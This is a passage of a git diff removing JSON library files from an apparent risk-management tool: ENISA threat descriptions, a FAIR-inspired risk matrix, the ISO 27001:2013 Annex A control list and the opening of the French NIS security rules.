the behaviour of systems. These threats are also the basis of many other threats, also discussed in this report. For instance, ransomware, RDoS (Ransomware Denial of Service), DDoS (Distributed Denial of Service) aim to deny access to data and possibly collect a payment to restore this access. Technically speaking, threats against data can be mainly classified as data breach and data leak. Data breach is an intentional attack brought by a cybercriminal with the goal of gaining unauthorised access and the release of sensitive, confidential or protected data. Data leak is an event that can cause the unintentional release of sensitive, confidential or protected data due to, for example, misconfigurations, vulnerabilities or human errors.", - "provider": "ENISA" - } - }, - { - "type": "threat", - "fields": { - "name": "Threats against availability: Denial of Service", - "description": "Availability is the target of a plethora of threats and attacks, among which DDoS stands out. DDoS targets system and data availability and, though it is not a new threat, it has a significant role in the cybersecurity threat landscape. Attacks occur when users of a system or service are not able to access relevant data, services or other resources. This can be accomplished by exhausting the service and its resources or overloading the components of the network infrastructure. During the reporting period, threats against availability and ransomware rank the highest among the prime threats, which signals a change from ETL 2021 where ransomware was clearly at the top.", - "provider": "ENISA" - } - }, - { - "type": "threat", - "fields": { - "name": "Threats against availability: Internet threats", - "description": "Internet use and the free flow of information impacts the lives of everyone. For many people, access to the internet has become a basic necessity to work, study, and to exercise freedom of expression, political freedom, and to interact socially. This group covers the threats that have an impact on the availability of the internet, such as BGP (Border Gateway Protocol) highjacking. Denial of Service (DoS) is covered in a separate section due to its individual impact in the threat landscape.", - "provider": "ENISA" - } - }, - { - "type": "threat", - "fields": { - "name": "Disinformation - misinformation", - "description": "Disinformation and misinformation campaigns are still on the rise, spurred by the increased use of social media platforms and online media. Digital platforms are nowadays the norm for news and media. Social sites, news and media outlets, even search engines, are now sources of information for many people. Due to the nature of how these sites operate, which is by attracting people and generating traffic to their sites, the information that generates more viewers is usually the one promoted, sometimes without it being validated. The war between Russia and Ukraine has shown new ways to use this threat, targeting people’s perception of the status of the war and the responsibilities of the parties involved. Various motives underlie the differences between wrong and purposely falsified information. This is where the definitions of misinformation and disinformation come into play.", - "provider": "ENISA" - } - }, - { - "type": "threat", - "fields": { - "name": "Supply Chain Attacks", - "description": "A supply chain attack targets the relationship between organisations and their suppliers17. For this ETL report we use the definition as stated in the ENISA Threat Landscape for Supply Chain18 where an attack is considered to have a supply chain component when it consists of a combination of at least two attacks. For an attack to be classified as a supply chain attack, both the supplier and the customer have to be targets. SolarWinds was one of the first revelation of this kind of attack and showed the potential impact of supply chain attacks. It seems that threat actors are continuing19 to feed on this source to conduct their operations and gain a foothold within organisations, in an attempt to benefit from the widespread impact and potential victim base of such attacks.", - "provider": "ENISA" - } - } - ] -} \ No newline at end of file diff --git a/library/libraries/FAIR matrix.json b/library/libraries/FAIR matrix.json deleted file mode 100644 index b230785..0000000 --- a/library/libraries/FAIR matrix.json +++ /dev/null @@ -1,35 +0,0 @@ -{ - "locale": "en", - "name": "FAIR matrix", - "description": "Balanced 3x3 matrix inspired from FAIR", - "format_version": "1.0", - "objects": [ - { - "type": "matrix", - "fields": { - "name": "balanced", - "description": "inspired from FAIR", - "probability" : [ - {"abbreviation": "L", "name": "Low", "description": "Unfrequent event"}, - {"abbreviation": "M", "name": "Medium", "description": "Occasional event"}, - {"abbreviation": "H", "name": "High", "description": "Frequent event"} - ], - "impact": [ - {"abbreviation": "L", "name": "Low", "description": "Low impact"}, - {"abbreviation": "M", "name": "Medium", "description": "Medium impact"}, - {"abbreviation": "H", "name": "High", "description": "High impact"} - ], - "risk": [ - {"abbreviation": "L", "name": "Low", "description": "acceptable risk", "hexcolor": "#00FF00"}, - {"abbreviation": "M", "name": "Medium", "description": "risk requiring mitigation within 2 years","hexcolor": "#FFFF00"}, - {"abbreviation": "H", "name": "High", "description": "unacceptable risk", "hexcolor": "#FF0000"} - ], - "grid": [ - [0, 0, 1], - [0, 1, 1], - [1, 1, 2] - ] - } - } - ] -} \ No newline at end of file diff --git a/library/libraries/ISO27001 Annex A.json b/library/libraries/ISO27001 Annex A.json deleted file mode 100644 index 2819b87..0000000 --- a/library/libraries/ISO27001 Annex A.json +++ /dev/null @@ -1,921 +0,0 @@ -{ - "locale": "en", - "name": "ISO 27001:2013 Annex A", - "description": "security functions from ISO27001 Annex A", - "format_version": "1.0", - "copyright": "©ISO/CEI 2013 – All rights reserved", - "objects": [ - { - "type": "security_function", - "fields": { - "name": "A.5.1.1 Policies for information security", - "description": "A set of policies for information security shall be defined, approved by management, published and communicated to employees and relevant external parties.", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.5.1.2 Review of the policies for information security", - "description": "To keep updated with any changes, whether internal or external, the organisation's ISMS policies must be updated on a regular basis.", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.6.1.1 Information security roles and responsibilities", - "description": "All information security responsibilities shall be defined and allocated.", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.6.1.2 Segregation of duties", - "description": "Conflicting duties and areas of responsibility shall be segregated to reduce opportunities for unauthorized or unintentional modification or misuse of the organization\u2019s assets.", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.6.1.3 Contact with authorities", - "description": "Appropriate contacts with relevant authorities shall be maintained.", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.6.1.4 Contact with special interest groups", - "description": "Appropriate contacts with special interest groups or other specialist security forums and professional associations shall be maintained.", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.6.1.5 Information security in project management", - "description": "Information security shall be addressed in project management, regardless of the type of the project.", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.6.2.1 Mobile device policy", - "description": "A policy and supporting security measures shall be adopted to manage the risks introduced by using mobile devices.", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.6.2.2 Teleworking", - "description": "A policy and supporting security measures shall be implemented to protect information accessed, processed or stored at teleworking sites.", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.7.1.1 Screening", - "description": "All job applicants should be subjected to background checks and competency assessments as part of a thorough control.", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.7.1.2 Terms and conditions of employment", - "description": "The contractual agreements with employees and contractors shall state their and the organization\u2019s responsibilities for information security.", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.7.2.1 Management responsibilities", - "description": "Management shall require all employees and contractors to apply information security in accordance with the established policies and procedures of the organization.", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.7.2.2 Information security awareness, education and training", - "description": "All employees of the organization and, where relevant, contractors shall receive appropriate awareness education and training and regular updates in organizational policies and procedures, as relevant for their job function.", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.7.2.3 Disciplinary process", - "description": "There shall be a formal and communicated disciplinary process in place to take action against employees who have committed an information security breach.", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.7.3.1 Termination or change of employment responsibilities", - "description": "Information security responsibilities and duties that remain valid after termination or change of employment shall be defined, communicated to the employee or contractor and enforced.", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.8.1.1 Inventory of assets", - "description": "Assets associated with information and information processing facilities shall be identified and an inventory of these assets shall be drawn up and maintained.", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.8.1.2 Ownership of assets", - "description": "Assets maintained in the inventory shall be owned.", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.8.1.3 Acceptable use of assets", - "description": "Rules for the acceptable use of information and of assets associated with information and information processing facilities shall be identified, documented and implemented.", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.8.1.4 Return of assets", - "description": "All employees and external party users shall return all of the organizational assets in their possession upon termination of their employment, contract or agreement.", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.8.2.1 Classification of information", - "description": "Information shall be classified in terms of legal requirements, value, criticality and sensitivity to unauthorised disclosure or modification.", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.8.2.2 Labelling of information", - "description": "An appropriate set of procedures for information labelling shall be developed and implemented in accordance with the information classification scheme adopted by the organization.", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.8.2.3 Handling of assets", - "description": "Procedures for handling assets shall be developed and implemented in accordance with the information classification scheme adopted by the organization.", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.8.3.1 Management of removable media", - "description": "Procedures shall be implemented for the management of removable media in accordance with the classification scheme adopted by the organization.", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.8.3.2 Disposal of media", - "description": "Media shall be disposed of securely when no longer required, using formal procedures.", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.8.3.3 Physical media transfer", - "description": "Media containing information shall be protected against unauthorized access, misuse or corruption during transportation.", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.9.1.1 Access control policy", - "description": "An access control policy shall be established, documented and reviewed based on business and information security require-ments.", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.9.1.2 Access to networks and network services", - "description": "Users shall only be provided with access to the network and network services that they have been specifically authorized to use.", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.9.2.1 User registration and de-registration", - "description": "A formal user registration and de-registration process shall be implemented to enable assignment of access rights.", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.9.2.2 User access provisioning", - "description": "A formal user access provisioning process shall be implemented to assign or revoke access rights for all user types to all systems and services.", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.9.2.3 Management of privileged access rights", - "description": "The allocation and use of privileged access rights shall be restricted and controlled.", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.9.2.4 Management of secret authentication information of users", - "description": "The allocation of secret authentication information shall be controlled through a formal management process.", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.9.2.5 Review of user access rights", - "description": "Asset owners shall review users\u2019 access rights at regular intervals.", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.9.2.6 Removal or adjustment of access rights", - "description": "The access rights of all employees and external party users to information and information processing facilities shall be removed upon termination of their employment, contract or agreement, or adjusted upon change.", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.9.3.1 Use of secret authentication information", - "description": "Users shall be required to follow the organization\u2019s practices in the use of secret authentication information.", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.9.4.1 Information access restriction", - "description": "Access to information and application system functions shall be restricted in accordance with the access control policy.", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.9.4.2 Secure log-on procedures", - "description": "Where required by the access control policy, access to systems and applications shall be controlled by a secure log-on procedure.", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.9.4.3 Password management system", - "description": "Password management systems shall be interactive and shall ensure quality passwords.", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.9.4.4 Use of privileged utility programs", - "description": "The use of utility programs that might be capable of overriding system and application controls shall be restricted and tightly controlled.", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.9.4.5 Access control to program source code", - "description": "Access to program source code shall be restricted.", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.10.1.1 Policy on the use of cryptographic controls", - "description": "A policy on the use of cryptographic controls for protection of information shall be developed and implemented.", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.10.1.2 Key management", - "description": "A policy on the use, protection and lifetime of cryptographic keys shall be developed and implemented through their whole lifecycle.", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.11.1.1 Physical security perimeter", - "description": "Security perimeters shall be defined and used to protect areas that contain either sensitive or critical information and information processing facilities.", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.11.1.2 Physical entry controls", - "description": "Secure areas shall be protected by appropriate entry controls to ensure that only authorized personnel are allowed access.", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.11.1.3 Securing offices, rooms and facilities", - "description": "Physical security for offices, rooms and facilities shall be designed and applied.", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.11.1.4 Protecting against external and environmental threats", - "description": "Physical protection against natural disasters, malicious attack or accidents shall be designed and applied.", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.11.1.5 Working in secure areas", - "description": "Procedures for working in secure areas shall be designed and applied.", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.11.1.6 Delivery and loading areas", - "description": "Access points such as delivery and loading areas and other points where unauthorized persons could enter the premises shall be controlled and, if possible, isolated from information processing facilities to avoid unauthorized access.", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.11.2.1 Equipment siting and protection", - "description": "Equipment shall be sited and protected to reduce the risks from environmental threats and hazards, and opportunities for unauthorized access.", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.11.2.2 Supporting utilities", - "description": "Equipment shall be protected from power failures and other disruptions caused by failures in supporting utilities.", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.11.2.3 Cabling security", - "description": "Power and telecommunications cabling carrying data or supporting information services shall be protected from interception, interference or damage.", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.11.2.4 Equipment maintenance", - "description": "Equipment shall be correctly maintained to ensure its continued availability and integrity.", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.11.2.5 Removal of assets", - "description": "Equipment, information or software shall not be taken off-site without prior authorization.", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.11.2.6 Security of equipment and assets off-premises", - "description": "Security shall be applied to off-site assets taking into account the different risks of working outside the organization\u2019s premises.", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.11.2.7 Secure disposal or reuse of equipment", - "description": "All items of equipment containing storage media shall be verified to ensure that any sensitive data and licensed software has been removed or securely overwritten prior to disposal or re-use.", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.11.2.8 Unattended user equipment", - "description": "Users shall ensure that unattended equipment has appropriate protection.", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.11.2.9 Clear desk and clear screen policy", - "description": "A clear desk policy for papers and removable storage media and a clear screen policy for information processing facilities shall be adopted.", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.12.1.1 Documented operating procedures", - "description": "Operating procedures shall be documented and made available to all users who need them.", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.12.1.2 Change management", - "description": "Changes to the organization, business processes, information processing facilities and systems that affect information security shall be controlled.", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.12.1.3 Capacity management", - "description": "The use of resources shall be monitored, tuned and projections made of future capacity requirements to ensure the required system performance.", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.12.1.4 Separation of development, testing and operational environments", - "description": "Development, testing, and operational environments shall be separated to reduce the risks of unauthorized access or changes to the operational environment.", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.12.2.1 Controls against malware", - "description": "Detection, prevention and recovery controls to protect against malware shall be implemented, combined with appropriate user awareness.", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.12.3.1 Information backup", - "description": "Backup copies of information, software and system images shall be taken and tested regularly in accordance with an agreed backup policy.", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.12.4.1 Event logging", - "description": "Event logs recording user activities, exceptions, faults and information security events shall be produced, kept and regularly reviewed.", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.12.4.2 Protection of log information", - "description": "Logging facilities and log information shall be protected against tampering and unauthorized access.", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.12.4.3 Administrator and operator logs", - "description": "System administrator and system operator activities shall be logged and the logs protected and regularly reviewed.", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.12.4.4 Clock synchronisation", - "description": "The clocks of all relevant information processing systems within an organization or security domain shall be synchronised to a single reference time source.", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.12.5.1 Installation of software on operational systems", - "description": "Procedures shall be implemented to control the installation of software on operational systems.", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.12.6.1 Management of technial vulnerabilities", - "description": "Information about technical vulnerabilities of information systems being used shall be obtained in a timely fashion, the organization\u2019s exposure to such vulnerabilities evaluated and appropriate measures taken to address the associated risk.", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.12.6.2 Restrictions on software installation", - "description": "Rules governing the installation of software by users shall be established and implemented.", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.12.7.1 Information systems audit controls", - "description": "Audit requirements and activities involving verification of operational systems shall be carefully planned and agreed to minimise disruptions to business processes.", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.13.1.1 Network controls", - "description": "Networks shall be managed and controlled to protect information in systems and applications.", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.13.1.2 Security of network services", - "description": "Security mechanisms, service levels and management requirements of all network services shall be identified and included in network services agreements, whether these services are provided in-house or outsourced.", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.13.1.3 Segregation in networks", - "description": "Groups of information services, users and information systems shall be segregated on networks.", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.13.2.1 Information transfer policies and procedures", - "description": "Formal transfer policies, procedures and controls shall be in place to protect the transfer of information through the use of all types of communication facilities.", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.13.2.2 Agreements on information transfer", - "description": "Agreements shall address the secure transfer of business information between the organization and external parties.", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.13.2.3 Electronic messaging", - "description": "Information involved in electronic messaging shall be appropriately protected.", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.13.2.4 Confidentiality or non-disclosure agreements", - "description": "Requirements for confidentiality or non-disclosure agreements reflecting the organization\u2019s needs for the protection of information shall be identified, regularly reviewed and documented.", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.14.1.1 Information security requirements analysis and specification", - "description": "The information security related requirements shall be included in the requirements for new information systems or enhancements to existing information systems.", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.14.1.2 Securing application services on public networks", - "description": "Information involved in application services passing over public networks shall be protected from fraudulent activity, contract dispute and unauthorized disclosure and modification.", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.14.1.3 Protecting application services transactions", - "description": "Information involved in application service transactions shall be protected to prevent incomplete transmission, mis-routing, unauthorized message alteration, unauthorized disclosure, unauthorized message duplication or replay.", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.14.2.1 Secure development policy", - "description": "Rules for the development of software and systems shall be established and applied to developments within the organization.", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.14.2.2 System change control procedures", - "description": "Changes to systems within the development lifecycle shall be controlled by the use of formal change control procedures.", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.14.2.3 Technical review of applications after operating platform changes", - "description": "When operating platforms are changed, business critical applications shall be reviewed and tested to ensure there is no adverse impact on organizational operations or security.", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.14.2.4 Restrictions on changes to software packages", - "description": "Modifications to software packages shall be discouraged, limited to necessary changes and all changes shall be strictly controlled.", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.14.2.5 Secure system engineering principles", - "description": "Principles for engineering secure systems shall be established, documented, maintained and applied to any information system implementation efforts.", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.14.2.6 Secure development environment", - "description": "Organizations shall establish and appropriately protect secure development environments for system development and integration efforts that cover the entire system development lifecycle.", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.14.2.7 Outsourced development", - "description": "The organization shall supervise and monitor the activity of outsourced system development.", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.14.2.8 System security testing", - "description": "Testing of security functionality shall be carried out during development.", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.14.2.9 System acceptance testing", - "description": "Acceptance testing programs and related criteria shall be established for new information systems, upgrades and new versions.", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.14.3.1 Protection of test data", - "description": "Test data shall be selected carefully, protected and controlled.", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.15.1.1 Information security policy for supplier relationships", - "description": "Information security requirements for mitigating the risks associated with supplier\u2019s access to the organization\u2019s assets shall be agreed with the supplier and documented.", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.15.1.2 Addressing security within supplier agreements", - "description": "All relevant information security requirements shall be established and agreed with each supplier that may access, process, store, communicate, or provide IT infrastructure components for, the organization\u2019s information.", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.15.1.3 Information and communication technology supply chain", - "description": "Agreements with suppliers shall include requirements to address the information security risks associated with information and communications technology services and product supply chain.", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.15.2.1 Monitoring and review of supplier services", - "description": "Organizations shall regularly monitor, review and audit supplier service delivery.", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.15.2.2 Managing changes to supplier services", - "description": "Changes to the provision of services by suppliers, including maintaining and improving existing information security policies, procedures and controls, shall be managed, taking account of the criticality of business information, systems and processes involved and re-assessment of risks.", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.16.1.1 Responsibilities and procedures", - "description": "Management responsibilities and procedures shall be established to ensure a quick, effective and orderly response to information security incidents.", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.16.1.2 Reporting information security events", - "description": "Information security events shall be reported through appropriate management channels as quickly as possible.", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.16.1.3 Reporting information security weaknesses", - "description": "Employees and contractors using the organization\u2019s information systems and services shall be required to note and report any observed or suspected information security weaknesses in sys-tems or services.", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.16.1.4 Assessment of and decision on information security events", - "description": "Information security events shall be assessed and it shall be decided if they are to be classified as information security incidents.", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.16.1.5 Response to information security incidents", - "description": "Information security incidents shall be responded to in accordance with the documented procedures.", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.16.1.6 Learning from information security incidents", - "description": "Knowledge gained from analysing and resolving information security incidents shall be used to reduce the likelihood or impact of future incidents.", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.16.1.7 Collection of evidence", - "description": "The organization shall define and apply procedures for the identification, collection, acquisition and preservation of information, which can serve as evidence.", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.17.1.1 Planning information security continuity", - "description": "The organization shall determine its requirements for information security and the continuity of information security management in adverse situations, e.g. during a crisis or disaster.", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.17.1.2 Implementing information security continuity", - "description": "The organization shall establish, document, implement and maintain processes, procedures and controls to ensure the required level of continuity for information security during an adverse situation.", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.17.1.3 Verify, review and evaluate information security continuity", - "description": "The organization shall verify the established and implemented information security continuity controls at regular intervals in order to ensure that they are valid and effective during adverse situations.", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.17.2.1 Availability of information processing facilities", - "description": "Information processing facilities shall be implemented with redundancy sufficient to meet availability requirements.", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.18.1.1 Identification of applicable legislation and contractual requirements", - "description": "All relevant legislative statutory, regulatory, contractual requirements and the organization\u2019s approach to meet these requirements shall be explicitly identified, documented and kept up to date for each information system and the organization.", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.18.1.2 Intellectual property rights", - "description": "Appropriate procedures shall be implemented to ensure compliance with legislative, regulatory and contractual requirements related to intellectual property rights and use of proprietary software products.", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.18.1.3 Protection of records", - "description": "Records shall be protected from loss, destruction, falsification, unauthorized access and unauthorized release, in accordance with legislatory, regulatory, contractual and business requirements.", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.18.1.4 Privacy and protection of personally identifiable information", - "description": "Privacy and protection of personally identifiable information shall be ensured as required in relevant legislation and regulation where applicable.", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.18.1.5 Regulation of cryptographic controls", - "description": "Cryptographic controls shall be used in compliance with all relevant agreements, legislation and regulations.", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.18.2.1 Independent review of information security", - "description": "The organization\u2019s approach to managing information security and its implementation (i.e. control objectives, controls, policies, processes and procedures for information security) shall be reviewed independently at planned intervals or when significant changes occur.", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.18.2.2 Compliance with security policies and standards", - "description": "Managers shall regularly review the compliance of information processing and procedures within their area of responsibility with the appropriate security policies, standards and any other security requirements.", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.18.2.3 Technical compliance review", - "description": "Information systems shall be regularly reviewed for compliance with the organization\u2019s information security policies and standards.", - "provider": "ISO 27001:2013" - } - } - ] -} \ No newline at end of file diff --git a/library/libraries/NIS.json b/library/libraries/NIS.json deleted file mode 100644 index 03ee371..0000000 --- a/library/libraries/NIS.json +++ /dev/null @@ -1,193 +0,0 @@ -{ - "locale": "fr", - "name": "Règles NIS", - "description": "Règles NIS - Arrêté du 14 septembre 2018 fixant les règles de sécurité et les délais mentionnés à l'article 10 du décret n° 2018-384 du 23 mai 2018 relatif à la sécurité des réseaux et systèmes d'information des opérateurs de services essentiels et des fournisseurs de service numérique", - "format_version": "1.0", - "copyright": "https://www.legifrance.gouv.fr/loda/id/JORFTEXT000037444012/", - "objects": [ - { - "type": "security_function", - "fields": { - "name": "Gouvernance - Règle 1. Analyse de risque", - "description": "L'opérateur de services essentiels effectue et tient à jour, dans le cadre de l'homologation de sécurité prévue à la règle 3, une analyse de risque de ses systèmes d'information essentiels (SIE). Cette analyse de risque prend notamment en compte l'analyse que l'opérateur a menée pour identifier ses systèmes d'information en tant que SIE.", - "provider": "NIS" - } - }, - { - "type": "security_function", - "fields": { - "name": "Gouvernance - Règle 2. Politique de sécurité", - "description": "L'opérateur de services essentiels élabore, tient à jour et met en œuvre une politique de sécurité des réseaux et systèmes d'information (PSSI). La PSSI décrit l'ensemble des procédures et des moyens organisationnels et techniques mis en œuvre par l'opérateur afin d'assurer la sécurité de ses systèmes d'information essentiels (SIE).", - "provider": "NIS" - } - }, - { - "type": "security_function", - "fields": { - "name": "Gouvernance - Règle 3. Homologation de sécurité", - "description": "L'opérateur de services essentiels procède à l'homologation de sécurité de chaque système d'information essentiel (SIE), en mettant en œuvre la procédure d'homologation prévue par sa politique de sécurité des réseaux et systèmes d'information.", - "provider": "NIS" - } - }, - { - "type": "security_function", - "fields": { - "name": "Gouvernance - Règle 4. Indicateurs", - "description": "L'opérateur de services essentiels évalue et tient à jour, pour chaque système d'information essentiel (SIE), les indicateurs suivants : - des indicateurs relatifs au maintien en conditions de sécurité des ressources : - le pourcentage de postes utilisateurs dont les ressources systèmes ne sont pas installées dans une version supportée par le fournisseur ou le fabricant ; - le pourcentage de serveurs dont les ressources systèmes ne sont pas installées dans une version supportée par le fournisseur ou le fabricant ; - des indicateurs relatifs aux droits d'accès des utilisateurs et à l'authentification des accès aux ressources : - le pourcentage d'utilisateurs accédant au SIE au 